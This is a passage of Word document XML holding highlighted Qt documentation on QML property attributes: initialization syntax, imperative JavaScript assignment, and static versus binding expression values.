      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property Item someItem</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="3A4055"/>
        <w:spacing w:before="180" w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property Rectangle someRectangle</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This applies to</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2730" w:anchor="defining-object-types-from-qml" w:history="1">
        <w:r w:rsidRPr="00EA1A01">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>custom QML types</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>as well. If a QML type was defined in a file named</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ColorfulButton.qml</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(in a directory which was then imported by the client), then a property of type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ColorfulButton</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>would also be valid.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2466" w:name="assigning-values-to-property-attributes"/>
      <w:bookmarkStart w:id="2467" w:name="_Toc483001066"/>
      <w:bookmarkStart w:id="2468" w:name="_Toc483604401"/>
      <w:bookmarkStart w:id="2469" w:name="_Toc483605621"/>
      <w:bookmarkEnd w:id="2466"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Assigning Values to Property Attributes</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2467"/>
      <w:bookmarkEnd w:id="2468"/>
      <w:bookmarkEnd w:id="2469"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value of a property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an object instance may be specified in two separate ways:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>value assignment on initialization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="89"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="120" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">an </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>imperative value assignment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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>either case</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, the value may </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be either a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value or a</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binding expression</w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:spacing w:before="360" w:after="120"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2470" w:name="value-assignment-on-initialization"/>
      <w:bookmarkStart w:id="2471" w:name="_Toc483001067"/>
      <w:bookmarkStart w:id="2472" w:name="_Toc483604402"/>
      <w:bookmarkStart w:id="2473" w:name="_Toc483605622"/>
      <w:bookmarkEnd w:id="2470"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Value Assignment on Initialization</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2471"/>
      <w:bookmarkEnd w:id="2472"/>
      <w:bookmarkEnd w:id="2473"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> for assigning a value to a property on initialization is:</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tag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;propertyName&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="tag"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;value&gt;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An initialization value assignment may be combined with a property definition in an object declaration, if desired. In that case, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the property definition becomes:</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r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>default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&lt;propertyType&gt;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&lt;propertyName&gt;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&lt;value&gt;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An </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of property value initialization follows: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lastRenderedPageBreak/>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"red"</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color nextColor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"blue"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 combined property declaration and initialization</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8"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C10CB8">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00C10CB8" w:rsidRDefault="00EA1A01" w:rsidP="00490E7E">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2474" w:name="imperative-value-assignment"/>
      <w:bookmarkStart w:id="2475" w:name="_Toc483001068"/>
      <w:bookmarkStart w:id="2476" w:name="_Toc483604403"/>
      <w:bookmarkStart w:id="2477" w:name="_Toc483605623"/>
      <w:bookmarkEnd w:id="2474"/>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Imperative Value Assignment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2475"/>
      <w:bookmarkEnd w:id="2476"/>
      <w:bookmarkEnd w:id="2477"/>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An </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>imperative value assignment</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>where a property value</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (either static value or binding expression) </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is assigned to a property from imperative JavaScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of an imperative value assignment is just the JavaScript assignment operator, as shown below:</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[&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>objectId</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;.]&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>propertyName</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;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value</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An </w:t>
      </w:r>
      <w:r w:rsidRPr="00C371C5">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>example</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> of imperative value assignment follows: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id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rect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Component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onCompleted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rect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color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"red"</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490E7E">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2478" w:name="static-values-and-binding-expression-val"/>
      <w:bookmarkStart w:id="2479" w:name="_Toc483001069"/>
      <w:bookmarkStart w:id="2480" w:name="_Toc483604404"/>
      <w:bookmarkStart w:id="2481" w:name="_Toc483605624"/>
      <w:bookmarkEnd w:id="2478"/>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Static Values and Binding Expression Values</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2479"/>
      <w:bookmarkEnd w:id="2480"/>
      <w:bookmarkEnd w:id="2481"/>
    </w:p>
    <w:p w:rsidR="00EA1A01" w:rsidRPr="00EA1A01" w:rsidRDefault="00EA1A01" w:rsidP="00EA1A01">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="120" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">As previously noted, there are </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>two kinds of values</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may be assigned to a property</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, and</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>binding expression</w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D1BBB">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>values</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>The latter are also known as</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2731" w:history="1">
        <w:r w:rsidRPr="008D1BBB">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:i/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
          <w:t>property bindings</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00EA1A01">
        <w:rPr>
          <w:i/>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9400"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2030"/>
        <w:gridCol w:w="7370"/>
